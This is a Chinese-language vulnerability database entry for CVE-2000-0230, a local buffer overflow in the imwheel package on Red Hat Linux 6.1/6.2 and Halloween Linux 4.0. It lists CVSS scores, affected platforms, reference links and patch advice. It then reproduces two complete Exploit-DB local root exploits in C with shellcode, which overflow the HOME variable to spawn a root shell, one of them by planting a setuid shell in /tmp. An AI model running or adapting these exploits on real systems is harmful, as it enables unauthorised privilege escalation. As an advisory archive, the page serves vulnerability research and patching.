CVE-2000-0230
CVSS7.2
发布时间 :2000-03-13 00:00:00
修订时间 :2008-09-10 15:03:40
NMCOE    

[原文]Buffer overflow in imwheel allows local users to gain root privileges via the imwheel-solo script and a long HOME environmental variable.


[CNNVD]多个Linux厂商的imwheel漏洞(CNNVD-200003-026)

        imwheel中存在缓冲区溢出漏洞,本地用户可以通过imwheel-solo脚本和超长HOME环境变量获得根用户权限。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:redhat:linux:6.2Red Hat Linux 6.2
cpe:/o:redhat:linux:6.1Red Hat Linux 6.1
cpe:/o:halloween:halloween_linux:4.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0230
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0230
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200003-026
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/1060
(UNKNOWN)  BID  1060
http://www.redhat.com/support/errata/RHSA-2000-016.html
(UNKNOWN)  REDHAT  RHSA-2000:016
http://archives.neohapsis.com/archives/bugtraq/2000-03/0168.html
(UNKNOWN)  BUGTRAQ  20000316 TESO & C-Skills development advisory -- imwheel

- 漏洞信息

多个Linux厂商的imwheel漏洞
高危 缓冲区溢出
2000-03-13 00:00:00 2005-05-02 00:00:00
本地  
        imwheel中存在缓冲区溢出漏洞,本地用户可以通过imwheel-solo脚本和超长HOME环境变量获得根用户权限。

- 公告与补丁

        RedHat has made patches available for this problem.
        Removal of the setuid wrapper script 'imwheel-solo' will eliminate this problem.
        RedHat Linux 6.1 i386
        
        RedHat Linux 6.1 sparc
        
        RedHat Linux 6.1 alpha
        
        RedHat Linux 6.2 sparc
        
        RedHat Linux 6.2 i386
        
        RedHat Linux 6.2 alpha
        

- 漏洞信息 (19811)

Halloween Linux 4.0,RedHat Linux 6.1/6.2 imwheel Vulnerability (1) (EDBID:19811)
linux local
2000-03-13 Verified
0 funkysh
N/A [点击下载]
source: http://www.securityfocus.com/bid/1060/info

A vulnerability exists in the 'imwheel' package for Linux. This package is known to be vulnerable to a buffer overrun in its handling of the HOME environment variable. By supplying a sufficiently long string containing machine executable code, the imwheel program can be caused to run arbitrary commands as root. This is due to a setuid root perl script named 'imwheel-solo' which invokes the imwheel program with effective UID 0. 

/*
 *  imwheel local root exploit [ RHSA-2000:016-02 ]
 *  funkysh 04/2000 funkysh@kris.top.pl
 */
  
#include <stdlib.h>
#include <stdio.h>

#define BUFFER 2070
#define NOP 0x90
#define PATH "/usr/X11R6/bin/imwheel-solo"  

char code[]="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46"
            "\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e"
            "\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8"
            "\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long getesp(void) { __asm__("movl %esp,%eax"); }
        
int main(int argc, char *argv[])
{
  int i, offset = 0;
  char buf[BUFFER];
  long address;
  if(argc > 1) offset = atoi(argv[1]);
  address = getesp() + 1000 + offset;
  memset(buf,NOP,BUFFER);
  memcpy(buf+(BUFFER-300),code,strlen(code));

  for(i=(BUFFER-250);i<BUFFER;i+=4)
  *(int *)&buf[i]=address;
  setenv("DISPLAY", "DUPA", 1);
  setenv("HOME", buf, 1);
  execl(PATH, PATH, 0);
}           
		

- 漏洞信息 (19812)

Halloween Linux 4.0,RedHat Linux 6.1/6.2 imwheel Vulnerability (2) (EDBID:19812)
linux local
2000-03-13 Verified
0 S. Krahmer & Stealth
N/A [点击下载]
source: http://www.securityfocus.com/bid/1060/info
 
A vulnerability exists in the 'imwheel' package for Linux. This package is known to be vulnerable to a buffer overrun in its handling of the HOME environment variable. By supplying a sufficiently long string containing machine executable code, the imwheel program can be caused to run arbitrary commands as root. This is due to a setuid root perl script named 'imwheel-solo' which invokes the imwheel program with effective UID 0. 

/*** Halloween 4 local root exploit for imwheel-solo. Other distros are
 *** maybe affected as well.
 *** (C) 2000 by C-skills development. Under the GPL. 
 *** 
 *** Bugdiscovery + exploit by S. Krahmer & Stealth.
 ***
 *** !!! FOR EDUCATIONAL PURPOSES ONLY !!!
 ***
 *** other advisories and kewl stuff at:
 *** http://www.cs.uni-potsdam.de/homepages/students/linuxer
 ***
 ***/
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>
#include <errno.h>



/* chown("/tmp/boomsh", 0, 0); chmod("/tmp/boomsh", 04755);
 */
char shell[] =
"\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x58\x80\x36\x01\x46\xe2\xfa"
"\xea\x0d\x2e\x75\x6c\x71\x2e\x63\x6e\x6e\x6c\x72\x69\x01\x80\xed"
"\x66\x2a\x01\x01\x54\x88\xe4\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\xab\x11"
"\x01\x01\x30\xc8\x8c\xb2\x3b\xee\xfe\xfe\xb9\xb7\x01\x01\x01\x88\xcb\x52\x88"
"\xf2\xcc\x81\xb8\xec\x08\x01\x01\xb9\x0e\x01\x01\x01\x52\x88\xf2\xcc\x81\x30"
"\xc1\x5a\x5f\x88\xed\x5c\xc2\x91\x91\x91\x91\x91\x91\x91\x91";


/* filename-buffer plus ret + ebp
 */
#define buflen (2048+8)

int main(int argc, char **argv)
{						       		
	char *im[] = {
		"/usr/X11R6/bin/imwheel-solo", 
		0
	};
	char *a[] = {
		"/tmp/boomsh",
		0
	};
	FILE *f;
	struct stat s;	
	char boom[buflen+10];
	int i = 0, j = 0, ret =  0xbfffee68;	/* this address works for me */

	if ((f = fopen("/tmp/boomsh.c", "w+")) == NULL) {
		perror("fopen");
		exit(errno);
	}
	printf("Creating boom-shell...\n");
	fprintf(f, "int main() {char *a[]={\"/bin/sh\",0};\nsetuid(0);\nexecve(*a, a, 0);\nreturn 0;}\n");
	fclose(f);
	system("cc /tmp/boomsh.c -o /tmp/boomsh");

	printf("Creating shellcode...\n");
    	memset(boom, 0, sizeof(boom));
	memset(boom, 0x90, buflen);
	if (argc > 1)
		ret += atoi(argv[1]);
	else
		printf("You can also add an offset to the commandline.\n");
	for (i = buflen-strlen(shell)-4; i < buflen-4; i++)
		boom[i] = shell[j++];
	*(long*)(&boom[i]) = ret; 
	
	printf("Get the real deal at http://www.cs.uni-potsdam.de/homepages/students/linuxer\n"
	       "Respect other users privacy!\n");
	
	setenv("HOME", boom, 1);
	setenv("DISPLAY", ":0", 1);
	
	printf("Invoking vulnerable program (imwheel-solo)...\n");
	if (fork() == 0) {
		execl(im[0], im[0], im[1], im[2], 0);
	}
	sleep(4);
	
	memset(&s, 0, sizeof(s));
	stat("/tmp/boomsh", &s);
	if ((S_ISUID & s.st_mode) != S_ISUID) {
		printf("Boom-shell not SUD-root! Wrong offset or patched version of imwheel.\n");
		return -1;
	}
	/* Huh? :-)
	 */
	printf("Knocking on heavens door...\n");
	execve(a[0], a, 0);
	return 0;
}		

- 漏洞信息

1258
Linux imwheel HOME Environment Variable Local Overflow
Local Access Required Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

2000-03-16 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Red Hat has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站